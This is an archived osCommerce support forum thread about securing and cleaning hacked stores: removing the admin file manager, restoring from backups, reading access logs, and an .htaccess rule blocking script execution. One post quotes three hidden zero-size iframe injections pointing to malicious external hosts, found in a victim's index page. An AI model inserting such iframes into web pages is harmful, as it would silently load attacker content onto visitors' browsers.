Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

How to secure your osCommerce 2.2 site.


spooks

Recommended Posts

  • Replies 657
  • Created
  • Last Reply

Sam please.....

 

If that patch covers the xxx.php/login.php what exactly does this one of FWR?

http://forums.oscomm...ost__p__1467014

I though it was for this issue....

 

Regards

 

 

It is, as he stated in that post 'SCRIPT_NAME' is fine in most cases, but on some some servers does not return the expected result, hence his code there.

 

ie its most likely that the code above is all you need, a few servers will need the other though, test which works on yours.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

Hi all,

 

I was looking at my stats yesterday and I'm getting an unusual traffic from about 6 sites in china.

 

When I visit these sites, It's always a replica of my home page (for exemple www.siteXYZ.cn/catalog/). Now when I click on any link, it comes back to my site.

 

I've installed Security Pro and IP Trap, cleared my stats, but the referers keep coming back.

 

Has anyone experienced that?

 

Thanks in advance for any input.

Link to comment
Share on other sites

When I visit these sites, It's always a replica of my home page (for exemple www.siteXYZ.cn/catalog/). Now when I click on any link, it comes back to my site.

 

I've installed Security Pro and IP Trap, cleared my stats, but the referers keep coming back.

 

 

 

Sound typical of a hacked site (yours) why have you limited to only a bit of security, you must apply all detailed in the op for a fully secure site.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

Sound typical of a hacked site (yours) why have you limited to only a bit of security, you must apply all detailed in the op for a fully secure site.

 

I'm adding everything but the kitchen sink as I type. Hopefully that will take care of it.

Link to comment
Share on other sites

I'm adding everything but the kitchen sink as I type. Hopefully that will take care of it.

 

 

The only trouble is if your already hacked ( as it sounds ) thats too late, best option is to wipe the site & restore with a 'clean' backup, then add security.

 

No amount security will stop hackers that have hidden back doors etc in place.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

It has long been known the filemanger is a security risk & should, nay MUST be removed, if used for editing your site it is likely to damage your files, so is a bad utility to keep anyway, see here. Its also been known its a possible hacking route & to make matters worse there now exists a very nasty hack that uses filemanger to gain access to your site ( dbase included!! )

 

Use a normal editor such as html-kit or notepad++ after downloading all your files to your PC with ftp such as filezilla.

 

 

 

I know this is probably a crazy question but I'm a newbie to this. But if I use filezilla, do I download they file manager that is in my cpanel from my host or the OS commerce file manager? The reason I ask is I've had someone on different forum say that we should NEVER mess with the file manager in os commerce. And what is the difference in the file manager in my cpanel and the one in os commerce??

 

Thanks

Link to comment
Share on other sites

I know this is probably a crazy question but I'm a newbie to this. But if I use filezilla, do I download they file manager that is in my cpanel from my host or the OS commerce file manager? The reason I ask is I've had someone on different forum say that we should NEVER mess with the file manager in os commerce. And what is the difference in the file manager in my cpanel and the one in os commerce??

 

Thanks

 

 

Its file_manager.php in admin that must be deleted, that one allows you to edit (and damage) files.

 

cPanel filemanager allows you to re-name/ move / delete / chmod files. Thats where you set permissions.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

The only trouble is if your already hacked ( as it sounds ) thats too late, best option is to wipe the site & restore with a 'clean' backup, then add security.

 

No amount security will stop hackers that have hidden back doors etc in place.

 

Thanks Sam and Withney for your input.

 

I've deleted; clean restored everything; changed passwords; renamed admin folder; removed file manager; implemented all the security add-ons. I still have the same sites displaying a copy of mine.

 

I pinged the sites and it returns my site's IP address. Turns out to be, according to my ISP and my tests, that a bunch of chinese sites domains are pointing to mine.

Why? I have no clue. Neither does my ISP.

 

So someone out there is registering domain names and pointing them at mine. Makes absolutely no sense whatsoever. Very very strange...

 

I tried to do some research to find out what would be the purpose of it but found nothing.

 

my site is 4wheelsautoparts dot com and two of the sites (out of about a dozen) are zn66 dot cn / feitian dot cc

 

Weird or what?

Link to comment
Share on other sites

I pinged the sites and it returns my site's IP address. Turns out to be, according to my ISP and my tests, that a bunch of chinese sites domains are pointing to mine.

 

The mapping of the domain name and the IP address is done by the DNS servers pointed to by the domain registrar, and these servers are typically manged by the hosting company (yes, there are exceptions like OpenDNS). So there is a chance that this is just a mistake, and that an email with the Chinese sites' hosting company can fix the problem.

Check out Chad's News.

Link to comment
Share on other sites

The mapping of the domain name and the IP address is done by the DNS servers pointed to by the domain registrar, and these servers are typically manged by the hosting company (yes, there are exceptions like OpenDNS). So there is a chance that this is just a mistake, and that an email with the Chinese sites' hosting company can fix the problem.

Thanks Chad for the input. I'll contact my Chinese friends to see if they can be of any help.

Link to comment
Share on other sites

I'm sorry if this has been repeated I have installed Site monitor. When I go to Admin > configure the set up pages goes blank.

sitemonitor_configure_setup.php

 

I am not sure why it isn't working please help.

 

Thanks

Link to comment
Share on other sites

I'm sorry if this has been repeated I have installed Site monitor. When I go to Admin > configure the set up pages goes blank.

sitemonitor_configure_setup.php

 

I am not sure why it isn't working please help.

 

Thanks

Site Monitor Support thread link

 

If you install a contribution and it has an active support thread you need to use it.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

I have installed Security Pro, Sitemoniter, htaccess protection, anti xss, ect. All appear to be working. According to my host and my own testing, all permissions are 755 and less. I did not feel the need to use an IP trap or anything for ftp access as my individual ip is the only allowed, all others are disallowed. Yet, on a daily basis an iframe will inject itself into the index page after <body>. There are no new scripts that I can find in any folders or any pages. The invisible files all seem appropriate. The iframe attacks include the following.

 

<iframe src=http://vip-stats.info/ts/in.cgi?2 width=0 height=0 frameborder=0></iframe>
<iframe src=http://test-id.biz/ts/in.cgi?2 width=0 height=0 frameborder=0></iframe>
<iframe src=http://id-tester.info/ts/in.cgi?2 width=0 height=0 frameborder=0></iframe>

 

My host has run multiple tests to see any security flaws, but come up with nothing. I have gone over backup versions scanning for possible inserts, but found nothing other than what I have modified. I have exhausted myself keeping up with the inserts as they happen once a day. I have yet to have any malware warnings, although eventually it will catch up to me as I will miss something. I have a freelancer that is going to look into what could be the problem, but my hopes for his success are low. Has anyone else had these specific iframe attacks? I know the vip-stats is fairly common. I was wondering if anyone has been attacked in this manner and what may have been the causing factor.

Link to comment
Share on other sites

Your host isn't "savvy" enough to examine the site access logs to find out where/how this is originating?

:unsure:

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Your host isn't "savvy" enough to examine the site access logs to find out where/how this is originating?

:unsure:

I am not sure what you mean by access logs as my IP is the only IP that has access. This problem only started occurring within the last 2 weeks. I have a log of ftp ip addresses, but all access is limited to my ip or an ip of a freelancer, none of which have had access in 5-6 months.

Link to comment
Share on other sites

I am not sure what you mean by access logs as my IP is the only IP that has access. This problem only started occurring within the last 2 weeks. I have a log of ftp ip addresses, but all access is limited to my ip or an ip of a freelancer, none of which have had access in 5-6 months.

So the site isn't accessible from the internet (admin and catalog) to anyone but you?

:unsure:

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

So the site isn't accessible from the internet (admin and catalog) to anyone but you?

:unsure:

No, I was referring to ftp access. Highlighting the fact the admin folder is not named admin, computer is well protected with antivirus (macosx), passwords have been changed, ect. Even then, the only file that ever shows a change is the index. If you are saying that my host should be able to tell me if someone is in my admin folder, and that just by somehow accessing the admin folder would be able to insert a code in the index, and only the index, without the filemanager.php, why would they only attack index? I agree that my host should be able to assist, but they cannot. They isolated two files that could be acting as shells, neither of which were.

Link to comment
Share on other sites

If the site is being attacked from the outside, the answer is in the access logs.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

If the site is being attacked from the outside, the answer is in the access logs.

Well the host had renamed a file from log to data and then placed the logs inside this. I found daily logs for the last 7 days. There are an average of 40,000 lines per daily log. This shows the IP, Time, "GET, "POST, and "HEAD, and file or page. It seems like a difficult challenge to isolate an ip address that could be the root cause.

Link to comment
Share on other sites

Well the host had renamed a file from log to data and then placed the logs inside this. I found daily logs for the last 7 days. There are an average of 40,000 lines per daily log. This shows the IP, Time, "GET, "POST, and "HEAD, and file or page. It seems like a difficult challenge to isolate an ip address that could be the root cause.

I never said it was going to be easy.

 

When the index file is modified it leaves a timestamp when this happened.

 

Concentrate on entries in that timeframe.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Add a .htaccess including the following code.

 

php_flag engine off
<Files ~ "\.(php*|s?p?html|cgi|pl)$">
deny from all
</Files>

 

I've taken a close look at the regular expression in this .htaccess code, and am thinking that it should be

php.*

instead of

php*

The code as it stands will prohibit files with an extension of ".ph", ".php", ".phpp", ".phppp", etc. But I think the intention was to prohibit any extension that begins with ".php" (such as ".php", ".php3", ".php4", etc.).

 

Am I wrong?

Check out Chad's News.

Link to comment
Share on other sites

I never said it was going to be easy.

 

When the index file is modified it leaves a timestamp when this happened.

 

Concentrate on entries in that timeframe.

 

Well. The site was not attacked again until today. I caught it immediately (within 15 minutes of the modification. Looked through the log and other than a MSN and Yahoo Bot, there were 3 ip's logged at the exact minute of attack. Unfortunately, each of these were easily traced back to school districts, which are a main purchaser from our site. These ips did not match up to any other of the logs with attacks.

 

Is there any other way an injection could be occurring? As the log file tells me the attack did not seem to come from the outside, must I assume it came from within? I have stripped each folder down to bare bones, searching through every file, and have not found a single change that corresponds to a customization we did not develop. There was a few day delay in this last attack, down from once every 12 hours. I was about to hire a professional to audit and cleanse the site and database, but my experience with freelancers has been sketchy. That is why I have been trying to figure this out myself.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...